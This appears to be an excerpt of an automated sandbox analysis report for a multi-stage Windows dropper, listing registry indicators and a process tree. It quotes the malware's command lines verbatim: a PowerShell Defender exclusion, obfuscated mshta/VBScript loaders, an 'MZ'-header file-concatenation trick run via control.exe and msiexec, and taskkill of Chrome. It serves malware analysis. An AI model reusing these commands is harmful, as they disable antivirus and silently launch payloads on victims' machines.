| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4160 -ip 4160
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$5024C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 612
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$301D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4168 -ip 4168
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4980 -ip 4980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 620
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4168 -ip 4168
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 640
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4168 -ip 4168
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 748
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 776
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4168 -ip 4168
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 828
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 640
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff91260cc40,0x7ff91260cc4c,0x7ff91260cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2524 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3080 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4520 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3632 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1352
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
Files